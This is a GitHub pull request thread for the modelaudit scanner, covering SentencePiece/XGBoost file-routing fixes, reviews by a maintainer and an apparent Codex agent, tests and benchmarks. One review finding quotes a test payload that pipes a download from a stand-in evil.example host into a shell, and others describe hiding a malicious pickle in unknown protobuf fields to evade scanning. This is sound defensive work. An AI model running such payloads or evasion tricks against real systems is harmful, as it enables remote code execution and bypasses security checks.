fix: keep sentencepiece tokenizers out of xgboost routing by mldangelo-oai · Pull Request #1641 · promptfoo/modelaudit

mldangelo-oai · 2026-06-11T01:08:35Z

Summary

Add a bounded, dependency-free SentencePiece ModelProto classifier for strong tokenizer.model identification.
Keep XGBoost claiming ambiguous .model inputs, valid binf .model binaries, and XGBoost-shaped malformed controls so fail-closed coverage is preserved.
Add focused XGBoost routing regressions plus a changelog entry.

Root Cause

The .model suffix is intentionally absent from extension-only file type validation because it is shared by multiple ecosystems. After content detection returned unknown for Mistral tokenizer.model, ScannerRegistry fell back to extension routing. XGBoostScanner.can_handle() accepted every .model file, so the SentencePiece tokenizer was scanned as an XGBoost binary and emitted inconclusive S1004 / xgboost_binary_structure_unrecognized.

Security Tradeoff

This only suppresses XGBoost routing when the file prefix strongly matches SentencePiece ModelProto pieces: multiple scored piece messages, typed pieces, identity tokens, and . Malformed, truncated, generic protobuf-like, or otherwise ambiguous .model files still reach XGBoost and fail closed. Real XGBoost .model binaries remain scanned.

Validation

Final validation on merge commit 81b6d14:

uv run ruff format --check modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/ -> pass
uv run ruff check modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/ -> pass
uv run mypy modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/ -> pass
PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/scanners/test_xgboost_scanner.py --maxfail=1 -q -> 108 passed, 21 skipped
PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/scanners/test_xgboost_scanner.py tests/scanners/test_lightgbm_scanner.py tests/scanners/test_scanner_registry.py -k "sentencepiece or model or xgboost or extension_format_map" --maxfail=1 -q -> 137 passed, 21 skipped, 162 deselected
PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/scanners/test_lightgbm_scanner.py tests/scanners/test_scanner_registry.py -k "model or xgboost or extension_format_map" --maxfail=1 -q -> 29 passed, 162 deselected
PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/test_core.py -k "xgboost or sentencepiece" --maxfail=1 -q -> 45 passed, 596 deselected
PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/utils/sources/test_huggingface.py -k "xgboost or model" --maxfail=1 -q -> 210 passed, 1 skipped, 57 deselected
PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest -n auto -m "not slow and not integration" --maxfail=1 -> 17373 passed, 1292 skipped
git diff --check origin/main...HEAD -> pass

Note: one earlier pre-merge broad-lane run hit packages/modelaudit-picklescan/tests/test_api.py::test_scan_bytes_warns_when_allowlisted_module_is_unresolved once; the exact test passed on immediate serial rerun, and subsequent full broad-lane reruns passed.

Real-Model QA

Pinned model: mistralai/Mistral-7B-v0.1 @ 27d67f1b5f57dc0953326b2601d68371d40ea8da, file tokenizer.model.

Pre-fix confirmation on main SHA 2f782ba:

PROMPTFOO_DISABLE_TELEMETRY=1 uv run modelaudit scan --stream --no-cache --max-size 2MB --format json --output /tmp/modelaudit-t19-prefix-stream.json https://huggingface.co/mistralai/Mistral-7B-v0.1/resolve/27d67f1b5f57dc0953326b2601d68371d40ea8da/tokenizer.model -> exit 2, scanner_names=[xgboost], S1004, xgboost_binary_structure_unrecognized.
PROMPTFOO_DISABLE_TELEMETRY=1 uv run modelaudit scan --no-cache --max-size 2MB --format json --output /tmp/modelaudit-t19-prefix-localdir.json /tmp/modelaudit-t19-mistral-tokenizer-prefix -> exit 2, scanner_names=[xgboost], S1004, xgboost_binary_structure_unrecognized.

Post-fix final validation:

PROMPTFOO_DISABLE_TELEMETRY=1 uv run modelaudit scan --stream --no-cache --max-size 2MB --format json --output /tmp/modelaudit-t19-merged-stream.json https://huggingface.co/mistralai/Mistral-7B-v0.1/resolve/27d67f1b5f57dc0953326b2601d68371d40ea8da/tokenizer.model -> exit 0, issues=[], scanner_names=[], no S1004, no XGBoost outcome.
PROMPTFOO_DISABLE_TELEMETRY=1 uv run modelaudit scan --no-cache --max-size 2MB --format json --output /tmp/modelaudit-t19-merged-localdir.json /tmp/modelaudit-t19-mistral-tokenizer-prefix -> exit 0, issues=[], scanner_names=[], no S1004, no XGBoost outcome.

Unrestricted whole-model scans of this Mistral revision can still become inconclusive for separate reasons: the repository contains multi-gigabyte PyTorch shards, so scanner size limits/large-shard handling remain outside this tokenizer.model routing fix.

mldangelo-oai · 2026-06-11T01:08:50Z

@codex review

…t19-sentencepiece-routing-20260610

chatgpt-codex-connector · 2026-06-11T01:12:50Z

Codex Review: Didn't find any major issues. Breezy!

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

github-actions · 2026-06-11T01:32:36Z

Workflow run and artifacts

Performance Benchmarks

Compared 12 shared benchmarks with a regression threshold of 15%.
Status: 0 regressions, 0 improved, 12 stable, 0 new, 0 missing.
Aggregate shared-benchmark median: 1.427s -> 1.454s (+1.9%).

Workload	Benchmark	Target	Size	Files	Baseline	Current	Change	Status
`direct-malicious-upload`	`tests/benchmarks/test_picklescan_benchmarks.py::test_picklescan_direct_malicious_upload`	`malicious_reduce`	52 B	1	521.9us	555.2us	+6.4%	stable
`mixed-model-repository`	`tests/benchmarks/test_scan_benchmarks.py::test_scan_release_candidate_repository`	`release-candidate`	547.3 KiB	32	480.85ms	496.61ms	+3.3%	stable
`warm-cache-rescan`	`tests/benchmarks/test_scan_benchmarks.py::test_scan_warm_cached_repository_rescan`	`release-candidate`	547.3 KiB	32	108.84ms	111.72ms	+2.6%	stable
`nested-payload-review`	`tests/benchmarks/test_picklescan_benchmarks.py::test_picklescan_nested_payload_review[nested_raw]`	`nested_raw`	78 B	1	583.9us	569.8us	-2.4%	stable
`duplicate-heavy-registry`	`tests/benchmarks/test_scan_benchmarks.py::test_scan_duplicate_registry_snapshot`	`registry-snapshot`	915.2 KiB	13	393.82ms	401.19ms	+1.9%	stable
`nested-payload-review`	`tests/benchmarks/test_picklescan_benchmarks.py::test_picklescan_nested_payload_review[nested_hex]`	`nested_hex`	130 B	1	625.6us	616.0us	-1.5%	stable
`suspicious-pickle-intake`	`tests/benchmarks/test_scan_benchmarks.py::test_scan_suspicious_pickle_intake`	`suspicious-intake`	183.8 KiB	4	143.85ms	145.96ms	+1.5%	stable
`padded-multi-stream-upload`	`tests/benchmarks/test_picklescan_benchmarks.py::test_picklescan_padded_multi_stream_upload`	`multi_stream_padded`	4.1 KiB	1	649.7us	657.8us	+1.2%	stable
`single-checkpoint-preflight`	`tests/benchmarks/test_scan_benchmarks.py::test_scan_single_checkpoint_before_load`	`single_checkpoint.pkl`	183.0 KiB	1	72.20ms	71.71ms	-0.7%	stable
`clean-training-checkpoint`	`tests/benchmarks/test_picklescan_benchmarks.py::test_picklescan_clean_training_checkpoint`	`safe_large`	278.2 KiB	1	110.75ms	110.42ms	-0.3%	stable
`chunked-upload-stream`	`tests/benchmarks/test_picklescan_benchmarks.py::test_picklescan_chunked_upload_stream`	`chunked_stream`	278.2 KiB	1	113.46ms	113.16ms	-0.3%	stable
`nested-payload-review`	`tests/benchmarks/test_picklescan_benchmarks.py::test_picklescan_nested_payload_review[nested_base64]`	`nested_base64`	98 B	1	581.7us	580.6us	-0.2%	stable

mldangelo-oai · 2026-06-11T01:58:57Z

@codex review

chatgpt-codex-connector · 2026-06-11T02:01:43Z

Codex Review: Didn't find any major issues. You're on a roll.

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

mldangelo-oai · 2026-06-11T02:22:47Z

Independent review of PR #1641

Reviewed exact live head: 81b6d146a0a33d44bcc30e0178bbbb495ce482e9

Findings

P2: valid-looking prefix suppresses malformed SentencePiece tails

_has_strong_sentencepiece_model_proto_prefix() returns after eight recognized pieces without validating the remaining protobuf framing. XGBoostScanner.can_handle() then declines the file and the aggregate scan treats it as a clean unknown file.

Exact control:

payload = _sentencepiece_model_proto() + b"\x12\x80"
Path("tokenizer.model").write_bytes(payload)

The PR head classifies this as SentencePiece, skips XGBoost, and exits 0 with no issues. SentencePiece 0.2.1 rejects the same payload as an invalid ModelProto; main keeps it fail-closed as S1004. Add truncation, invalid-field, and arbitrary-tail cases after the eighth recognized piece. Positive routing must not turn malformed trailing framing into a clean scan.

P2: valid SentencePiece models can omit BOS, EOS, and PAD

The classifier requires three typed identity pieces plus literal <unk>. SentencePiece legitimately supports bos_id=-1, eos_id=-1, and pad_id=-1, leaving only the unknown piece typed specially.

A model produced by SentencePiece 0.2.1 with those settings loads successfully, but the PR classifier returns false, XGBoost claims it, and ModelAudit exits 2 with S1004. Add dependency-produced or official fixtures with BOS/EOS/PAD disabled and a customized unknown-piece string. Local and streaming scans should avoid XGBoost ownership without weakening malformed-input handling.

Validation

The PR's focused tests passed (6 passed) and the full XGBoost scanner suite passed (127 passed, 2 skipped), but neither case above is covered. Both findings should block merge.

mldangelo-oai · 2026-06-11T02:22:49Z

@codex address that feedback on the exact current head. Preserve positive routing for valid SentencePiece models, retain fail-closed behavior for malformed tails, run dependency-produced local and streaming end-to-end controls, and request a fresh exact-head review after pushing.

chatgpt-codex-connector

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 81b6d146a0

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

mldangelo-oai · 2026-06-11T02:53:53Z

Additional pinned SentencePiece QA: baidu/NAVA@16c20287c79c0085ebc8213ca7894701948891f0 routes Wan2.2-TI2V-5B/google/umt5-xxl/spiece.model into the TensorFlow protobuf inconclusive path. Add this file to the real-model ownership regression alongside the existing SentencePiece cases.

mldangelo-oai · 2026-06-11T03:00:44Z

@codex review exact head 65b64807d2a1800d7d79184f35837bbbe3b2077a

chatgpt-codex-connector

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 65b64807d2

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

mldangelo-oai · 2026-06-11T03:33:42Z

@codex review exact head 8da5a6c

mldangelo-oai · 2026-06-11T03:37:44Z

Pinned QA input: intfloat/multilingual-e5-base@d128750597153bb5987e10b1c3493a34e5a4502a contains two identical 5,069,051-byte sentencepiece.bpe.model files. Current main leaves both inconclusive under TensorFlow protobuf routing. Please validate the current head recognizes SentencePiece explicitly before generic protobuf ownership and retains malformed/truncated SentencePiece controls.

chatgpt-codex-connector

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 8da5a6ce54

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

mldangelo-oai · 2026-06-11T03:54:14Z

@codex review exact head 7294d3a

chatgpt-codex-connector · 2026-06-11T03:55:30Z

Codex Review: Didn't find any major issues. You're on a roll.

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

mldangelo-oai · 2026-06-11T04:20:10Z

@codex review exact head 395e755

chatgpt-codex-connector · 2026-06-11T04:23:42Z

Codex Review: Didn't find any major issues. What shall we delve into next?

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

mldangelo-oai · 2026-06-11T04:49:05Z

@codex add exact real-model QA for BAAI/bge-reranker-base@2cfc18c9415c912f9d8155881c133215df768a70: normal 5,069,051-byte sentencepiece.bpe.model is currently misrouted to TensorFlow protobuf and marked tensorflow_protobuf_routing_incomplete.

mldangelo-oai · 2026-06-11T04:52:01Z

@codex address these exact-head blockers before merge:

P1: semantically malformed SentencePiece protobufs can be accepted as tokenizer-owned and exit 0. Duplicate UNKNOWN pieces and BYTE pieces without trainer_spec.byte_fallback=true are rejected by official SentencePiece but become clean unknown files across direct, ZIP/TAR, and HF paths. If semantic validity cannot be proven dependency-free, keep routing ambiguous/fail closed.
P2: valid official models that omit proto2 default unk_id/unk_piece, or have fewer than eight pieces, still route to XGBoost and emit S1004. Add official-loader controls at every intake boundary.
P2: the bounded classifier runs five times per direct scan. A valid 4.69 MiB/300k-piece model took 3.0s versus 0.154s on base; cache/carry one stable result.
Additional pinned failures on current main: HuggingFaceH4/zephyr-7b-beta@892b3d7a7b1cf10c7a701c60881cd93df615734c/tokenizer.model and mistralai/Mistral-7B-Instruct-v0.1@ec5deb64f2c6e6fa90c1abf74a91d5c93a9669ca/tokenizer.model.

Independent report: /Users/mdangelo/modelaudit-pr-swarm/outputs/pr-1641-independent-review-20260611.md.

mldangelo-oai · 2026-06-11T05:05:58Z

Additional pinned baseline reproduction for SentencePiece routing:

Model: HuggingFaceH4/zephyr-7b-beta
HF revision: 892b3d7a7b1cf10c7a701c60881cd93df615734c
Selection rank: 240
Baseline ModelAudit: 8d6c4864fe2ea833ceaef1b9803d225afb1e8d69
Artifact: tokenizer.model
Result: XGBoost emitted S1004 File does not start with the expected XGBoost binary signature; the repository scan exited 2 despite zero failed checks.

Please add this exact pinned model to current-head QA and verify tokenizer.model is owned by SentencePiece rather than XGBoost, with renamed/malformed XGBoost controls still fail-closed.

chatgpt-codex-connector · 2026-06-11T05:11:43Z

Summary

Added a Hugging Face remote content-routing guard that fully validates .model files as complete SentencePiece ModelProto tokenizers before generic TensorFlow/CoreML/ONNX protobuf routing can claim them.
Added BAAI/bge-reranker-base sentencepiece.bpe.model regression coverage at the exact pinned 5,069,051-byte size, preserving local, aggregate, streaming, and CLI behavior as clean unknown with no XGBoost S1004 false positive.
Added Hugging Face selective-download QA for BAAI/bge-reranker-base@2cfc18c9415c912f9d8155881c133215df768a70, asserting the pinned sentencepiece.bpe.model does not route to TensorFlow protobuf and is not downloaded as a model protobuf candidate.
Committed changes as 908e801 test: cover BAAI sentencepiece protobuf routing and created a PR with the requested follow-up.

Testing

✅ PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/scanners/test_xgboost_scanner.py -k "baai or large_real_sentencepiece" --maxfail=1 -q
✅ PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/utils/sources/test_huggingface.py -k "baai_sentencepiece or sentencepiece_bpe" --maxfail=1 -q
✅ uv run ruff format modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
✅ uv run ruff check --fix modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
✅ uv run mypy modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
✅ git diff --check
⚠️ PROMPTFOO_DISABLE_TELEMETRY=1 uv run modelaudit scan --stream --no-cache --max-size 6MB --format json --output /tmp/modelaudit-baai-bge-reranker-base-sentencepiece.json https://huggingface.co/BAAI/bge-reranker-base/resolve/2cfc18c9415c912f9d8155881c133215df768a70/sentencepiece.bpe.model (warning: Hugging Face returned 403 Forbidden in this environment)
⚠️ PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest -n auto -m "not slow and not integration" --maxfail=1 (warning: a failure marker appeared in the broader xdist lane and the run continued for several minutes; stopped to avoid an indefinite run)

View task →

chatgpt-codex-connector · 2026-06-11T05:21:53Z

Summary

Added an exact-size synthetic QA generator for the pinned BAAI/bge-reranker-base@2cfc18c9415c912f9d8155881c133215df768a70/sentencepiece.bpe.model case, producing a 5,069,051-byte SentencePiece BPE-shaped model without committing a large binary fixture. tests/scanners/test_xgboost_scanner.pyL142-L160
Added end-to-end routing coverage asserting the pinned-size SentencePiece model is recognized by SentencePiece ownership, remains unknown to generic format detection, avoids tensorflow_protobuf_routing_incomplete, and does not route to XGBoost/S1004 across direct, aggregate, streaming, and CLI scans. tests/scanners/test_xgboost_scanner.pyL1980-L2023
Committed the change as 430099d test: cover BAAI sentencepiece routing and created a PR with the recorded summary/validation.

Testing

✅ uv run ruff format modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
✅ uv run ruff check --fix modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
✅ uv run mypy modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
✅ PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/scanners/test_xgboost_scanner.py -k "baai_bge_reranker_base_sentencepiece_bpe_model or large_real_sentencepiece_model_shape or malformed_tail or capped_sentencepiece" --maxfail=1 -q
❌ PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest -n auto -m "not slow and not integration" --maxfail=1 failed at tests/test_cli.py::test_cli_report_writers_reject_symlinked_parent_directory because the test expected exit code 2 but got 0; a focused serial rerun reproduced the same failure.
❌ PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/test_cli.py::test_cli_report_writers_reject_symlinked_parent_directory -q reproduced the same exit-code assertion failure.

View task →

mldangelo-oai · 2026-06-11T10:20:33Z

@codex review exact head 00de898a210eb6ed1b41d4c074a4d7567baa0c28\n\nFollow-up pushed for SentencePiece/XGBoost routing hardening. Local validation passed with four-worker broad pytest: 17433 passed, 1292 skipped; Ruff format/check and mypy are clean.

chatgpt-codex-connector

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 00de898a21

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

mldangelo-oai · 2026-06-11T11:02:17Z

Independent review of exact head 00de898a210eb6ed1b41d4c074a4d7567baa0c28 found four blockers:

P1: malformed SentencePiece models can exit clean. Ordinary piece text uniqueness is not validated. A model containing duplicate "dup" pieces is classified strong even though SentencePiece 0.2.1 rejects it as already defined. Base routes it to XGBoost/S1004 and exits 2; head returns unknown/success with no issues across direct, directory, streaming, ZIP, TAR, and CLI scans. Strong ownership needs official-equivalent uniqueness validation or fail-closed routing.
P1: bare compressed models lose PyTorch binary security analysis. Returning an empty suffix for wrappers such as model.gz makes generic extracted binary payloads extensionless/unknown. A payload containing os.system("curl https://evil.example/p | sh") changes from base pytorch_binary S902/exit 1 to head unknown/clean/exit 0; a blacklist marker similarly changes from critical to clean. Preserve .bin fallback unless SentencePiece ownership is positively established.
P2: the nominal 10 MiB ownership probe reads entire oversized files repeatedly. A 14,700,134-byte model was fully read in 120,027 reads, and one direct scan_file invoked classification four times. Enforce a real byte/work budget and cache classification without treating unread tails as strong.
P3: legal repeated TrainerSpec fields are treated as malformed. Proto2 merges repeated occurrences of a singular message field, but the parser replaces prior state. A valid model whose two TrainerSpec occurrences split required fields loads in SentencePiece 0.2.1, while head fails direct, streaming, ZIP, TAR, and CLI scans as sentencepiece_model_proto_routing_incomplete.

Validation: XGBoost had 186 passes/2 skips; focused core 61 passes; registry 22; Hugging Face source 211; compressed scanner 73 passes excluding one environment cache failure that reproduces on base; fixture hygiene 7. Three authentic models loaded with SentencePiece 0.2.1 and passed streaming CLI QA. Exact-head CI is fully green, but two current review threads remain unresolved and both P1 regressions block merge.

mldangelo-oai · 2026-06-11T11:21:54Z

@codex review exact head 6dab64eec24a874b26836ff29d388b963ed567aa

Follow-up pushed for the two exact-head Codex P2s: bounded SentencePiece ownership reads without XGBoost false positives, and restored raw-binary routing for bare compressed wrappers. Local validation passed: Ruff format/check, mypy, focused XGBoost/compressed/filetype/core/archive slices, and broad four-worker pytest (17440 passed, 1292 skipped).

chatgpt-codex-connector · 2026-06-11T11:25:46Z

Codex Review: Didn't find any major issues. You're on a roll.

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

mldangelo-oai · 2026-06-11T11:57:08Z

@codex review exact head a1b7f7871ec1bc472efe5024ffc8d6996ea63722

Follow-up pushed for the remaining bounded SentencePiece ownership thread. Local validation passed on this exact head: Ruff format/check, mypy, focused SentencePiece/XGBoost/compressed regressions, and broad four-worker pytest (17440 passed, 1292 skipped).

chatgpt-codex-connector

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: a1b7f7871e

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

mldangelo-oai · 2026-06-11T12:39:51Z

Independent review of exact head a1b7f7871ec1bc472efe5024ffc8d6996ea63722 found four blockers:

P1: unknown protobuf fields can carry unscanned payloads while suppressing fallback scanning. The SentencePiece classifier skips unknown top-level fields and still returns strong ownership. A legal length-delimited unknown field containing a malicious protocol-0 pickle loads successfully in SentencePiece 0.2.1, then scans clean across direct, aggregate, streaming, ZIP, TAR, and gzip routes. Base fails closed through XGBoost/S1004.
P1: tokenizer.gz bypasses PyTorch-binary security checks. Filename-only wrapper exemptions make tokenizer/spiece/sentencepiece gzip payloads extensionless. Identical binary content with blacklist marker CONFIDENTIAL is detected as S1001 in model.gz and on base tokenizer.gz, but current-head tokenizer.gz routes unknown and clean.
P2: repeated TrainerSpec messages do not follow protobuf merge semantics. Splitting valid fields across two field-2 occurrences yields a model SentencePiece 0.2.1 loads and protobuf merges to the original, but head classifies it malformed and reports XGBoost S1004 across direct/aggregate/stream/archive routes.
P2: the 10 MiB ownership cap is applied four times per direct scan. Instrumentation saw four full classifier invocations, approximately 40 MiB of ownership reads/parses before scanning. Compute once and propagate the route result.

Validation: 11 malformed/duplicate controls, 70 SentencePiece/compressed tests, 187 XGBoost tests with 2 skips, 211 HF selection tests, and 79 compressed tests passed. Real SentencePiece loading and protobuf merge behavior were verified. Exact-head CI is fully green, but one current thread matches the P1 unknown-field bypass. The two P1 clean-scan regressions block merge.

mldangelo-oai · 2026-06-11T12:39:59Z

@codex review exact head 3b2287c87e75b8c71b7952ba2b05b64b71c7b2ee

Follow-up pushed for the P1 unknown top-level SentencePiece field issue. Local validation passed on this exact head: Ruff format/check, mypy, focused SentencePiece/XGBoost/archive/core slices, and broad four-worker pytest (17452 passed, 1292 skipped).

mldangelo-oai · 2026-06-11T13:19:49Z

@codex review exact head 6660ef8b4c8d0d7bd26575df627a5036df833657

Follow-up pushed for the remaining exact-head review blockers: tokenizer-like gzip raw binaries now route inner payloads to PyTorch-binary unless the decompressed payload is a SentencePiece candidate, repeated TrainerSpec messages merge under proto2 semantics, and SentencePiece ownership probes are cached by stable file identity plus bounded content fingerprint. Local validation passed on this exact head: Ruff check/format-check, mypy, focused SentencePiece/XGBoost/compressed/archive/core slices, and broad four-worker pytest (17458 passed, 1292 skipped).

mldangelo-oai · 2026-06-11T13:20:00Z

@codex review exact head 6660ef8b7eba063b660608245922bb1a95128321

Corrected exact-head request for the just-pushed follow-up. Local validation on this head: Ruff check/format-check, mypy, focused SentencePiece/XGBoost/compressed/archive/core slices, and broad four-worker pytest (17458 passed, 1292 skipped).

chatgpt-codex-connector

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 6660ef8b7e

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

mldangelo-oai · 2026-06-11T13:49:35Z

@codex review exact head ac133a0eecddfa20459d273b095004f729b7915e

Follow-up pushed for the streamed SentencePiece wire-type P2. Fields 2-5 now require length-delimited wire type in the streaming classifier, with small malformed-tail and >10MiB streaming regressions. Local validation on this head: Ruff check/format-check, mypy, full XGBoost/compressed focused files, ZIP/TAR/core routing selections, and broad four-worker pytest (17467 passed, 1292 skipped).

chatgpt-codex-connector · 2026-06-11T13:52:29Z

Codex Review: Didn't find any major issues. More of your lovely PRs please.

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

…dangelo/codex/hf-fp-t19-sentencepiece-routing-20260610 # Conflicts: # modelaudit/utils/file/detection.py

mldangelo-oai · 2026-06-11T16:38:23Z

@codex review exact head 1eae3a83e6eed09c1a50bb99a9a7958b39076367

Maintainer follow-up pushed after merging current main: malformed SentencePiece-shaped .proto candidates now fail closed as sentencepiece_model_proto_routing_incomplete, while valid tokenizer .proto files remain clean unknown. Local validation on this exact head: focused SentencePiece/XGBoost regressions, adjacent XGBoost/compressed/fixture tests, Ruff check/format-check, mypy, and whitespace check.

chatgpt-codex-connector

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 1eae3a83e6

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

mldangelo-oai · 2026-06-11T17:06:01Z

@codex review exact head bb2ace43e49ebdca370aca029d2373a405cd6941

Follow-up pushed for the exact-head .proto P2: strong SentencePiece .proto tokenizers now return clean unknown before generic protobuf routing, while malformed .proto candidates still fail closed. Local validation on this exact head: targeted .proto regression tests, adjacent XGBoost/compressed/fixture tests, Ruff check/format-check, mypy, whitespace check, fixer sub-agent confirmation, and independent reviewer re-review with no findings.

chatgpt-codex-connector · 2026-06-11T17:08:26Z

Codex Review: Didn't find any major issues. Chef's kiss.

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

fix: keep sentencepiece tokenizers out of xgboost routing

c4229c7

Merge remote-tracking branch 'origin/main' into mdangelo/codex/hf-fp-…

81b6d14

…t19-sentencepiece-routing-20260610

chatgpt-codex-connector Bot reviewed Jun 11, 2026

View reviewed changes

Comment thread modelaudit/utils/file/detection.py Outdated

fix: tighten sentencepiece model routing

65b6480

chatgpt-codex-connector Bot reviewed Jun 11, 2026

View reviewed changes

Comment thread modelaudit/utils/file/detection.py Outdated

Comment thread modelaudit/utils/file/detection.py Outdated

fix: keep large sentencepiece models unclaimed

8da5a6c

fix: validate bounded sentencepiece ownership

7294d3a

chatgpt-codex-connector Bot reviewed Jun 11, 2026

View reviewed changes

Comment thread modelaudit/utils/file/detection.py Outdated

Comment thread modelaudit/utils/file/detection.py Outdated

Comment thread modelaudit/utils/file/detection.py Outdated

test: cover current sentencepiece trainer fields

395e755

fix: tighten sentencepiece tokenizer routing

5913118

fix: harden sentencepiece xgboost routing

00de898

mldangelo-oai requested a review from mldangelo June 11, 2026 10:20

chatgpt-codex-connector Bot reviewed Jun 11, 2026

View reviewed changes

Comment thread modelaudit/utils/file/detection.py Outdated

Comment thread modelaudit/scanners/compressed_scanner.py Outdated

fix: bound sentencepiece compressed routing

6dab64e

fix: make sentencepiece probe text budget explicit

a1b7f78

chatgpt-codex-connector Bot reviewed Jun 11, 2026

View reviewed changes

Comment thread modelaudit/utils/file/detection.py Outdated

fix: reject sentencepiece unknown field payloads

3b2287c

fix: close sentencepiece routing review gaps

6660ef8

chatgpt-codex-connector Bot reviewed Jun 11, 2026

View reviewed changes

Comment thread modelaudit/utils/file/detection.py

fix: guard streamed sentencepiece wire types

ac133a0

mldangelo-oai added 2 commits June 11, 2026 16:34

Merge branch 'main' of https://github.com/promptfoo/modelaudit into m…

2d08d83

…dangelo/codex/hf-fp-t19-sentencepiece-routing-20260610 # Conflicts: # modelaudit/utils/file/detection.py

fix: fail closed malformed sentencepiece proto routing

1eae3a8

chatgpt-codex-connector Bot reviewed Jun 11, 2026

View reviewed changes

Comment thread modelaudit/utils/file/detection.py Outdated

fix: treat sentencepiece proto tokenizers as unknown

bb2ace4

mldangelo-oai merged commit 5ac9efc into main Jun 11, 2026
29 checks passed

mldangelo-oai deleted the mdangelo/codex/hf-fp-t19-sentencepiece-routing-20260610 branch June 11, 2026 17:39

Conversation

mldangelo-oai commented Jun 11, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Summary

Root Cause

Security Tradeoff

Validation

Real-Model QA

Uh oh!

mldangelo-oai commented Jun 11, 2026

Uh oh!

chatgpt-codex-connector Bot commented Jun 11, 2026

Uh oh!

